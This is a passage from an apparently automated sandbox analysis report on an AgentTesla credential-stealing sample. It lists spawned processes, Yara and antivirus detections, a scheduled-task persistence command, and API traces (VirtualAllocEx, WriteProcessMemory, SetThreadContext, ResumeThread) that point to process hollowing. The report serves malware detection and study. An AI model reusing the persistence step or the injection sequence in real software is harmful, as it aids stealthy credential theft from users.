                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2118653417.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:10:19:44
                          Start date:23/04/2024
                          Path:C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
                          Imagebase:0xe40000
                          File size:736'776 bytes
                          MD5 hash:A474CCDA551682DCB92EFE1402DD02CB
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 71%, ReversingLabs
                          • Detection: 45%, Virustotal, Browse
                          Reputation:low
                          Has exited:true

                          Target ID:9
                          Start time:10:19:45
                          Start date:23/04/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff6ef0c0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:10:19:47
                          Start date:23/04/2024
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp"
                          Imagebase:0x190000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:10:19:47
                          Start date:23/04/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:12
                          Start time:10:19:47
                          Start date:23/04/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Imagebase:0xac0000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3276330521.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3276330521.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:false

                            Execution Graph

                            Execution Coverage:9.6%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:225
                            Total number of Limit Nodes:14
                            Memory Dump Source
                            • Source File: 00000000.00000002.2112550232.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_ab10000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 777eeb13a7ce636aef82c74a5301f6e581f2e80baaeeca760e9d9904835fc952
                            • Instruction ID: 3b6ce4203a834282b6e3fdac2d8785434f565aaa4d2b21789fd1ff2e070fbb6b
                            • Opcode Fuzzy Hash: 777eeb13a7ce636aef82c74a5301f6e581f2e80baaeeca760e9d9904835fc952
                            • Instruction Fuzzy Hash: 63C19A717016058FDB29DB79C490BAE77FAAF8A700F9448BDD146CB290DB34E902CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2112550232.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_ab10000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c231cb9fac6065dc000446a552400073b35108da55ce4bd7f6652e6e3c294dff
                            • Instruction ID: 9a94c98712e91506196db60c2dfd32c3fad8ea49e18191b1645a5453ff98f508
                            • Opcode Fuzzy Hash: c231cb9fac6065dc000446a552400073b35108da55ce4bd7f6652e6e3c294dff
                            • Instruction Fuzzy Hash: 8BA0016499E144E59031282920A44B4C06E122F504FC07289834F6358685068448341E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0766DC66
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 97ef79c67769aab7f9b828b8e565de78b1aaf1c83ae29269cfe772a205c45e5e
                            • Instruction ID: 7719193c0071b05dcb8c57c015a7d4fda435d2bf6f87e170b1a92f8352c89bbb
                            • Opcode Fuzzy Hash: 97ef79c67769aab7f9b828b8e565de78b1aaf1c83ae29269cfe772a205c45e5e
                            • Instruction Fuzzy Hash: 42A15CB1E0021ADFDF24DF68C844BEDBBB2BF49310F5481AAD809A7240DB749985CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph not reproduced)
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0766DC66
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 9552531f5a811fa80ecba77163056db3d9104d264a3539d35d6f9ad2b9a3b8c9
                            • Instruction ID: 5cdabf97dd75b96f97a380bc84ca0751ac91d21fb8629bf50886c74b03fd4477
                            • Opcode Fuzzy Hash: 9552531f5a811fa80ecba77163056db3d9104d264a3539d35d6f9ad2b9a3b8c9
                            • Instruction Fuzzy Hash: CC916CB1E0021ADFDF14DF68C844BEDBBB2BF49310F5481A9D809A7240DB749985CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph not reproduced)
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 018EB37E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 8ee089fa721b80fac2644e7fdfe92262ab0563fec3cb36b8f88452c7cca71d20
                            • Instruction ID: fc4e5e5b22592c156cdcb83b51269096adb8ac57b9875aacd63b31788a9a3be6
                            • Opcode Fuzzy Hash: 8ee089fa721b80fac2644e7fdfe92262ab0563fec3cb36b8f88452c7cca71d20
                            • Instruction Fuzzy Hash: 88814570A00B058FD724CF69D48979ABBF5FF8A704F008A29D48AD7B50DB34EA45CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph not reproduced)
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 018E5F59
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 056d58202d91c9079d5ea2a4cabb3c236e00e59b4af7c9ac5e20e18aa58143d2
                            • Instruction ID: 6e95b0ea7212c38aa7139d6831a286e2605aa594dd2e20e28c06c36a8cfef170
                            • Opcode Fuzzy Hash: 056d58202d91c9079d5ea2a4cabb3c236e00e59b4af7c9ac5e20e18aa58143d2
                            • Instruction Fuzzy Hash: D141E3B4C0071DCBDB24DFA9C848B9DBBF5BF49308F24806AD508AB255DB756946CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph not reproduced)
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 018E5F59
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 00c4a114ef69af79e6b402299eae0c00eff65261f9cb798c4eb38e0bafbb5cd7
                            • Instruction ID: 15f71145a08569f16131bad9c8452640e29cc9fa2f58a70b5a7c10916bd30c21
                            • Opcode Fuzzy Hash: 00c4a114ef69af79e6b402299eae0c00eff65261f9cb798c4eb38e0bafbb5cd7
                            • Instruction Fuzzy Hash: B64114B4C00719CFDB24CFA9C98879DBBF1BF49308F20806AD408AB255DB756946CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph not reproduced)
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 018EB37E
                              • Part of subcall function 018EA4B0: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018EB3F9,00000800,00000000,00000000), ref: 018EB60A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: 94c8246cda84b8605d1faf3c001de3ce5b131b79b822449094903ac8ffc3b874
                            • Instruction ID: 3932e65512d6ff6c5a127e12d9c43c4867275652244316b246a3ccf298c6f6f0
                            • Opcode Fuzzy Hash: 94c8246cda84b8605d1faf3c001de3ce5b131b79b822449094903ac8ffc3b874
                            • Instruction Fuzzy Hash: 64215BB2A00345CFDB20CF69D4493EBBBF5EF87318F19406ADA09D7251D6348906CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph not reproduced)
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0766D400
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 02013b461ac7cc9e3a062e392791a699614585fe3847a940bd65cd506b45fd7e
                            • Instruction ID: aadd1194607bb66ae79b272615f53778add7cdffa3b841792a010fbf26560824
                            • Opcode Fuzzy Hash: 02013b461ac7cc9e3a062e392791a699614585fe3847a940bd65cd506b45fd7e
                            • Instruction Fuzzy Hash: C82127B59003199FCF10DFA9C885BEEBBF5FF48310F50842AE919A7250C778A945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph not reproduced)
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0766D400
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 062eeefdcd3c282457a2eb21d1f9c36be0ecfb31cfae7f28f7a9f62a8aa5b421
                            • Instruction ID: c8a4c34596e16ff3dc30c614c3e3e901aab9658560ce9074379fd105a8986eef
                            • Opcode Fuzzy Hash: 062eeefdcd3c282457a2eb21d1f9c36be0ecfb31cfae7f28f7a9f62a8aa5b421
                            • Instruction Fuzzy Hash: F62139B19003199FCF10DFA9C885BEEBBF5FF48310F508429E919A7240C778A944CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0766D918
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 6670afe04baf480eba67488509793bf2e9b5fb44ff2e7c5dd2cdefbced910ebd
                            • Instruction ID: 064cc5a4de0e0bf368dd8adf59d41f4f3de19252c81b200afb0935d85ea45280
                            • Opcode Fuzzy Hash: 6670afe04baf480eba67488509793bf2e9b5fb44ff2e7c5dd2cdefbced910ebd
                            • Instruction Fuzzy Hash: 9D2159B1D003499FCB10DFAAC885AEEFBF5FF48320F50842AE559A7250D7389941CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766CE1E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 2893042ab25ba72f2a68a4615b56f72b801f97e6574c184b5018c14d2d867698
                            • Instruction ID: 6f60eed14b6c7e47d97212d09399344a3e07f57a0f19c6144f21ce5a3bcb3978
                            • Opcode Fuzzy Hash: 2893042ab25ba72f2a68a4615b56f72b801f97e6574c184b5018c14d2d867698
                            • Instruction Fuzzy Hash: 2B2157B1D002098FDB10DFAAC4857EEBBF4FF48320F10842AD559A7240CB78A945CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018ED9D6,?,?,?,?,?), ref: 018EDA97
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 6e4e4ef822b0230ca92a7cbfde56d958cb16b8f6a70920b1fc9c731ebd5f6d30
                            • Instruction ID: 379c8f10ba2c63bbcbc6d6120affac52fe6d6c75cb69f850638eef0cdcbe2c4c
                            • Opcode Fuzzy Hash: 6e4e4ef822b0230ca92a7cbfde56d958cb16b8f6a70920b1fc9c731ebd5f6d30
                            • Instruction Fuzzy Hash: 6321E5B59042099FDB10DF9AD584AEEFBF8EB48310F14851AE914A3350D378AA54CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766CE1E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 1d7be31c8725f2396bd953c0faf2aeb9866c195b31760fff64ba2eb097ae74fa
                            • Instruction ID: f3cb5db578fdcc02fac77d85a366abe2a4763ad0b375bf68cc59d5eb9ccc52a7
                            • Opcode Fuzzy Hash: 1d7be31c8725f2396bd953c0faf2aeb9866c195b31760fff64ba2eb097ae74fa
                            • Instruction Fuzzy Hash: 3B2135B19002098FDB10DFAAC4857EEBBF4EF88324F50842AD559A7240CB78A945CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0766D918
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: dbc45cea72dd8451d46e51e0f2e39fc98032b96081441790262934181b591d75
                            • Instruction ID: 46eb49ee62521435d601af8909406c09ebf600b746808979f6131550b8e4f9c6
                            • Opcode Fuzzy Hash: dbc45cea72dd8451d46e51e0f2e39fc98032b96081441790262934181b591d75
                            • Instruction Fuzzy Hash: 9A2139B1D003499FCB10DFAAC884AEEFBF5FF48310F508429E519A7250D7789945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018ED9D6,?,?,?,?,?), ref: 018EDA97
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 9ebe05d83eb704aa5dde9774a12d7893415ada765ab723117f562f9d109cdb60
                            • Instruction ID: 0e5cfb9dbb436a8db43c6099bd30e0159241f9091b1f6a6e97687ff3607a0089
                            • Opcode Fuzzy Hash: 9ebe05d83eb704aa5dde9774a12d7893415ada765ab723117f562f9d109cdb60
                            • Instruction Fuzzy Hash: 6121E3B5900208DFDB10CFA9D985ADEBBF4FF08310F14841AE918A7310D378AA44CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766D31E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 6b6f7e4a01724e2f5b65fd3a02bec52d9937ad968150e8b3f79e804ed8f60911
                            • Instruction ID: 6f8ecfd1b932bf89dee99c28e7bbbd0f02470d07e2a89c7edb6031564385c178
                            • Opcode Fuzzy Hash: 6b6f7e4a01724e2f5b65fd3a02bec52d9937ad968150e8b3f79e804ed8f60911
                            • Instruction Fuzzy Hash: 7B116AB59002499FCB10DFAAC844AEEFFF5EF88320F108419E519A7250CB75A544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018EB3F9,00000800,00000000,00000000), ref: 018EB60A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 90994737c2ae726060ebe442dc0ecdda79e933855b01d2811d14ff9437cbacc6
                            • Instruction ID: 7af257f78bd74c28c321547c8e2ba7656d693a2983985dcd189a1ddf1cc2e0d6
                            • Opcode Fuzzy Hash: 90994737c2ae726060ebe442dc0ecdda79e933855b01d2811d14ff9437cbacc6
                            • Instruction Fuzzy Hash: 721114B68003099FDB14CF9AC448BEEFBF4EB49310F14842AE919B7210C379A645CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766D31E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 7c18c0f4a270a603b8605a74c656c75676689e313b40febb234680b5df681eaa
                            • Instruction ID: 0e721670fc8ebe6eac60a76f37f11cd83c86d042d5c697cd1daf8cc9c080ad29
                            • Opcode Fuzzy Hash: 7c18c0f4a270a603b8605a74c656c75676689e313b40febb234680b5df681eaa
                            • Instruction Fuzzy Hash: 271137B19002499FCB10DFAAC844AEEFFF5EF48324F108419E519A7250CB79A944CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 677d38c2d69d65a1bda7b8cfa8643ff950228fa32b040296360b148bd9cde124
                            • Instruction ID: 388693e28e22878aa653d6c8e750b65437bdf8a5aa14869aea3caba289e6c451
                            • Opcode Fuzzy Hash: 677d38c2d69d65a1bda7b8cfa8643ff950228fa32b040296360b148bd9cde124
                            • Instruction Fuzzy Hash: CE115BB58006488FCB20DFAAC4457EEFFF5EF48724F108419D559A7650CB79A544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018EB3F9,00000800,00000000,00000000), ref: 018EB60A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 423f27e147d228412156e82c0a690f5870f69a847f82c326830edc8dac19b5f5
                            • Instruction ID: 56b0ba38129d5a63f4ac57cb453d6c4ff9ce57124f8bd3337a9c65439760b201
                            • Opcode Fuzzy Hash: 423f27e147d228412156e82c0a690f5870f69a847f82c326830edc8dac19b5f5
                            • Instruction Fuzzy Hash: 6D11F3B69002098FDB14CFAAD584BDEFBF5FB49310F10842AE519A7210C379A645CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: b6bd2a0fcc18b1024d10e4782e27fe178872bec129eb9e992f1759f0d7324b98
                            • Instruction ID: 01fa78ac5e3004d7ff3163cc4770ea6916cb85b31302c3594db3fc2c9b96779c
                            • Opcode Fuzzy Hash: b6bd2a0fcc18b1024d10e4782e27fe178872bec129eb9e992f1759f0d7324b98
                            • Instruction Fuzzy Hash: C71128B19006498FCB20DFAAC4457EEFBF5EF88724F208419D519A7250CB79A544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0AB11F0D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2112550232.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_ab10000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 1c97ccad465923a47cc8627b9e5071445d15d6c4aad2754f11169427516ef662
                            • Instruction ID: e3a24784a7888ff89483ce444133c7d7f764eab7bb653f5c8a7bb03828fb7da6
                            • Opcode Fuzzy Hash: 1c97ccad465923a47cc8627b9e5071445d15d6c4aad2754f11169427516ef662
                            • Instruction Fuzzy Hash: 7511F5B58003499FCB10DF99D484BDEFBF8FB48310F108559EA18A7210C379A944CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0AB11F0D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2112550232.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_ab10000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 23d6c6916b44129b267d19220dd05ea47340ed4749f192429b117a9320cf36fe
                            • Instruction ID: 38e6022dc4fe737e00785ee360eebe0dcf8f620a341cfcae1fac78dba53c2dcf
                            • Opcode Fuzzy Hash: 23d6c6916b44129b267d19220dd05ea47340ed4749f192429b117a9320cf36fe
                            • Instruction Fuzzy Hash: 6A1106B58003489FCB10DF99D885BDEFBF8FB48320F108559E958A7200C379A544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 018EB37E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2105561430.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_165d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2105561430.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_165d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2105561430.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_165d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
